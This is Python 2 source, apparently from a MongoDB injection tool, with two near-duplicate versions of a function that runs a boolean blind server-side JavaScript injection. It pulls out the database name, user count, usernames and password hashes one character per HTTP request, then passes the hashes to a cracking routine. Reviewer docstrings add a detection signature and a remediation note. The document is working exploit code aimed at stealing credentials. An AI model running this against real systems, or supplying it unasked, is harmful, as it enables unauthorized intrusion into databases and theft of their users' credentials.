def getDBInfo():
    """Recover the current database name and, optionally, its users and password hashes
    through a boolean blind-injection oracle, one HTTP request per guess.

    Each probe is uriArray[16] with the "---" placeholder replaced by a JavaScript
    fragment that evaluates to ``return true`` only when the guessed value (a length, or
    one character at one position) is right.  A guess counts as a hit when the response
    body length equals baseLen, the length measured for the unconditional
    "return true;" probe, so any byte of variation in the page (timestamps, nonces,
    error text) silently breaks the oracle.

    Reads module globals uriArray and requestHeaders, the helper
    getResponseBodyHandlingErrors (not visible here; presumably returns the body as a
    string), and nsmmongo.passCrack.  Side effects: HTTP requests, console output,
    raw_input prompts.  Returns None; recovered values are only printed and passed to
    passCrack.

    NOTE(review): from the defending side the signature is a burst of requests to one
    endpoint whose injected parameter differs only by an incrementing integer or a
    single candidate character and carries "db.getName()", "db.system.users" or
    "return true;".  The oracle exists only where request input reaches server-side
    JavaScript evaluation; removing that path removes the oracle.
    """
    curLen = 0
    nameLen = 0  # unused in this function
    gotFullDb = False  # unused in this function
    gotNameLen = False
    gotDbName = False
    gotColLen = False  # unused in this function
    gotColName = False  # unused in this function
    gotUserCnt = False
    finUser = False  # unused in this function
    dbName = ""  # accumulated below but never printed whole or returned
    charCounter = 0
    nameCounter = 0
    usrCount = 0
    retrUsers = 0
    users = []
    hashes = []
    crackHash = ""
    # candidate alphabet; the inner loops index chars without a bound, so a target
    # character outside this set ends in IndexError rather than a miss
    chars = string.ascii_letters + string.digits
    print "Getting baseline True query return size..."
    # unconditional true probe: its body length is the reference every later guess is
    # compared against
    trueUri = uriArray[16].replace("---", "return true; var dummy ='!" + "&")
    #print "Debug " + str(trueUri)
    req = urllib2.Request(trueUri, None, requestHeaders)
    baseLen = int(len(getResponseBodyHandlingErrors(req)))
    print "Got baseline true query length of " + str(baseLen)
    print "Calculating DB name length..."
    # step 1: linear search on the name length, starting at 0
    while gotNameLen == False:
        calcUri = uriArray[16].replace(
            "---", "var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
        #print "Debug: " + calcUri
        req = urllib2.Request(calcUri, None, requestHeaders)
        lenUri = int(len(getResponseBodyHandlingErrors(req)))
        #print "Debug length: " + str(lenUri)
        if lenUri == baseLen:
            # oracle hit: same body length as the unconditional true probe
            print "Got database name length of " + str(curLen) + " characters."
            gotNameLen = True
        else:
            curLen += 1
    print "Database Name: ",
    # step 2: one character at a time, trying chars in order at each position
    while gotDbName == False:
        charUri = uriArray[16].replace(
            "---", "var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '" + chars[charCounter] + "') { return true; } var dum='a" + "&")
        req = urllib2.Request(charUri, None, requestHeaders)
        lenUri = int(len(getResponseBodyHandlingErrors(req)))
        if lenUri == baseLen:
            dbName = dbName + chars[charCounter]
            print chars[charCounter],
            nameCounter += 1
            charCounter = 0
            if nameCounter == curLen:
                gotDbName = True
        else:
            charCounter += 1
    print "\n"
    getUserInf = raw_input("Get database users and password hashes (y/n)? ")
    if getUserInf.lower() == "y":
        charCounter = 0
        nameCounter = 0
        # find the total number of users on the database
        while gotUserCnt == False:
            usrCntUri = uriArray[16].replace(
                "---", "var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
            req = urllib2.Request(usrCntUri, None, requestHeaders)
            lenUri = int(len(getResponseBodyHandlingErrors(req)))
            if lenUri == baseLen:
                print "Found " + str(usrCount) + " user(s)."
                gotUserCnt = True
            else:
                usrCount += 1
        usrChars = 0  # total number of characters in username
        charCounterUsr = 0  # position in the character array-Username
        rightCharsUsr = 0  # number of correct characters-Username
        rightCharsHash = 0  # number of correct characters-hash
        charCounterHash = 0  # position in the character array-hash
        username = ""
        pwdHash = ""
        charCountUsr = False
        query = "{}"  # unused in this function
        # the two branches below are the same length-then-characters procedure; the
        # first user is fetched with a bare findOne(), every later one with a $nin
        # filter that excludes the usernames already collected in users
        while retrUsers < usrCount:
            if retrUsers == 0:
                while charCountUsr == False:
                    # different query to get the first user vs. others
                    usrUri = uriArray[16].replace(
                        "---", "var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))
                    if lenUri == baseLen:
                        # Got the right number of characters
                        charCountUsr = True
                    else:
                        usrChars += 1
                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace(
                        "---", "var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '" + chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))
                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0
                    else:
                        charCounterUsr += 1
                retrUsers += 1
                users.append(username)
                # reinitialize all variables and get ready to do it again
                #print str(retrUsers)
                #print str(users)
                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0
                username = ""
                while rightCharsHash < 32:
                    #Hash length is static
                    hashUri = uriArray[16].replace(
                        "---", "var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '" + chars[charCounterHash] + "') { return true; } var dum='a" + "&")
                    req = urllib2.Request(hashUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))
                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        #print pwdHash
                        rightCharsHash += 1
                        charCounterHash = 0
                    else:
                        charCounterHash += 1
                hashes.append(pwdHash)
                print "Got user:hash " + users[0] + ":" + hashes[0]
                # reinitialize all variables and get ready to do it again
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
            else:
                while charCountUsr == False:
                    # different query to get the first user vs. others
                    usrUri = uriArray[16].replace(
                        "---", "var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))
                    if lenUri == baseLen:
                        # Got the right number of characters
                        charCountUsr = True
                    else:
                        usrChars += 1
                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace(
                        "---", "var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '" + chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))
                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0
                    else:
                        charCounterUsr += 1
                retrUsers += 1
                # reinitialize all variables and get ready to do it again
                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0
                while rightCharsHash < 32:
                    #Hash length is static
                    hashUri = uriArray[16].replace(
                        "---", "var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '" + chars[charCounterHash] + "') { return true; } vardum='a" + "&")
                    req = urllib2.Request(hashUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))
                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        rightCharsHash += 1
                        charCounterHash = 0
                    else:
                        charCounterHash += 1
                # username is appended only after its hash here, unlike the first branch
                users.append(username)
                hashes.append(pwdHash)
                print "Got user:hash " + users[retrUsers - 1] + ":" + hashes[retrUsers - 1]
                # reinitialize all variables and get ready to do it again
                username = ""
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
        crackHash = raw_input("Crack recovered hashes (y/n)?: ")
        # interactive menu; userIndex is 1-based and is not validated before indexing
        while crackHash.lower() == "y":
            menuItem = 1
            for user in users:
                print str(menuItem) + "-" + user
                menuItem += 1
            userIndex = raw_input("Select user hash to crack: ")
            nsmmongo.passCrack(users[int(userIndex) - 1], hashes[int(userIndex) - 1])
            crackHash = raw_input("Crack another hash (y/n)?")
    raw_input("Press enter to continue...")
    return
def getDBInfo():
    """Recover the current database name and, optionally, its users and password hashes
    through a boolean blind-injection oracle, one HTTP request per guess.

    Each probe is uriArray[16] with the "---" placeholder replaced by a JavaScript
    fragment that evaluates to ``return true`` only when the guessed value (a length, or
    one character at one position) is right.  A guess counts as a hit when the response
    body length equals baseLen, the length measured for the unconditional
    "return true;" probe, so any byte of variation in the page (timestamps, nonces,
    error text) silently breaks the oracle.

    Requests go through urllib.urlopen(...).read() with no custom headers and no error
    handling, so a connection failure propagates out of this function.  Yes/no answers
    are tested against the module global yes_tag (not visible here; presumably the set
    of accepted "yes" inputs).  Also reads the module global uriArray and calls
    nsmmongo.passCrack.  Side effects: HTTP requests, console output, raw_input prompts.
    Returns None; recovered values are only printed and passed to passCrack.

    NOTE(review): from the defending side the signature is a burst of requests to one
    endpoint whose injected parameter differs only by an incrementing integer or a
    single candidate character and carries "db.getName()", "db.system.users" or
    "return true;".  The oracle exists only where request input reaches server-side
    JavaScript evaluation; removing that path removes the oracle.
    """
    curLen = 0
    nameLen = 0 #unused in this function
    gotFullDb = False #unused in this function
    gotNameLen = False
    gotDbName = False
    gotColLen = False #unused in this function
    gotColName = False #unused in this function
    gotUserCnt = False
    finUser = False #unused in this function
    dbName = "" #accumulated below but never printed whole or returned
    charCounter = 0
    nameCounter = 0
    usrCount = 0
    retrUsers = 0
    users = []
    hashes = []
    crackHash = ""
    #candidate alphabet; the inner loops index chars without a bound, so a target
    #character outside this set ends in IndexError rather than a miss
    chars = string.ascii_letters + string.digits
    print "Getting baseline True query return size..."
    #unconditional true probe: its body length is the reference for every later guess
    trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")
    #print "Debug " + str(trueUri)
    baseLen = int(len(urllib.urlopen(trueUri).read()))
    print "Got baseline true query length of " + str(baseLen)
    print "Calculating DB name length..."
    #step 1: linear search on the name length, starting at 0
    while gotNameLen == False:
        calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
        #print "Debug: " + calcUri
        lenUri = int(len(urllib.urlopen(calcUri).read()))
        #print "Debug length: " + str(lenUri)
        if lenUri == baseLen:
            #oracle hit: same body length as the unconditional true probe
            print "Got database name length of " + str(curLen) + " characters."
            gotNameLen = True
        else:
            curLen += 1
    print "Database Name: ",
    #step 2: one character at a time, trying chars in order at each position
    while gotDbName == False:
        charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")
        lenUri = int(len(urllib.urlopen(charUri).read()))
        if lenUri == baseLen:
            dbName = dbName + chars[charCounter]
            print chars[charCounter],
            nameCounter += 1
            charCounter = 0
            if nameCounter == curLen:
                gotDbName = True
        else:
            charCounter += 1
    print "\n"
    getUserInf = raw_input("Get database users and password hashes (y/n)? ")
    if getUserInf in yes_tag:
        charCounter = 0
        nameCounter = 0
        #find the total number of users on the database
        while gotUserCnt == False:
            usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
            lenUri = int(len(urllib.urlopen(usrCntUri).read()))
            if lenUri == baseLen:
                print "Found " + str(usrCount) + " user(s)."
                gotUserCnt = True
            else:
                usrCount += 1
        usrChars = 0 #total number of characters in username
        charCounterUsr = 0 #position in the character array-Username
        rightCharsUsr = 0 #number of correct characters-Username
        rightCharsHash = 0 #number of correct characters-hash
        charCounterHash = 0 #position in the character array-hash
        username = ""
        pwdHash = ""
        charCountUsr = False
        query = "{}" #unused in this function
        #the two branches below are the same length-then-characters procedure; the first
        #user is fetched with a bare findOne(), every later one with a $nin filter that
        #excludes the usernames already collected in users
        while retrUsers < usrCount:
            if retrUsers == 0:
                while charCountUsr == False:
                    #different query to get the first user vs. others
                    usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
                    lenUri = int(len(urllib.urlopen(usrUri).read()))
                    if lenUri == baseLen:
                        #Got the right number of characters
                        charCountUsr = True
                    else:
                        usrChars += 1
                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
                    lenUri = int(len(urllib.urlopen(usrUri).read()))
                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0
                    else:
                        charCounterUsr += 1
                retrUsers += 1
                users.append(username)
                #reinitialize all variables and get ready to do it again
                #print str(retrUsers)
                #print str(users)
                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0
                username = ""
                while rightCharsHash < 32:
                    #Hash length is static
                    hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")
                    lenUri = int(len(urllib.urlopen(hashUri).read()))
                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        #print pwdHash
                        rightCharsHash += 1
                        charCounterHash = 0
                    else:
                        charCounterHash += 1
                hashes.append(pwdHash)
                print "Got user:hash " + users[0] + ":" + hashes[0]
                #reinitialize all variables and get ready to do it again
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
            else:
                while charCountUsr == False:
                    #different query to get the first user vs. others
                    usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
                    lenUri = int(len(urllib.urlopen(usrUri).read()))
                    if lenUri == baseLen:
                        #Got the right number of characters
                        charCountUsr = True
                    else:
                        usrChars += 1
                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
                    lenUri = int(len(urllib.urlopen(usrUri).read()))
                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0
                    else:
                        charCounterUsr += 1
                retrUsers += 1
                #reinitialize all variables and get ready to do it again
                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0
                while rightCharsHash < 32:
                    #Hash length is static
                    hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")
                    lenUri = int(len(urllib.urlopen(hashUri).read()))
                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        rightCharsHash += 1
                        charCounterHash = 0
                    else:
                        charCounterHash += 1
                #username is appended only after its hash here, unlike the first branch
                users.append(username)
                hashes.append(pwdHash)
                print "Got user:hash " + users[retrUsers-1] + ":" + hashes[retrUsers-1]
                #reinitialize all variables and get ready to do it again
                username = ""
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
        crackHash = raw_input("Crack recovered hashes (y/n)?: ")
        #interactive menu; userIndex is 1-based and is not validated before indexing
        while crackHash in yes_tag:
            menuItem = 1
            for user in users:
                print str(menuItem) + "-" + user
                menuItem +=1
            userIndex = raw_input("Select user hash to crack: ")
            nsmmongo.passCrack(users[int(userIndex)-1],hashes[int(userIndex)-1])
            crackHash = raw_input("Crack another hash (y/n)?")
    raw_input("Press enter to continue...")
    return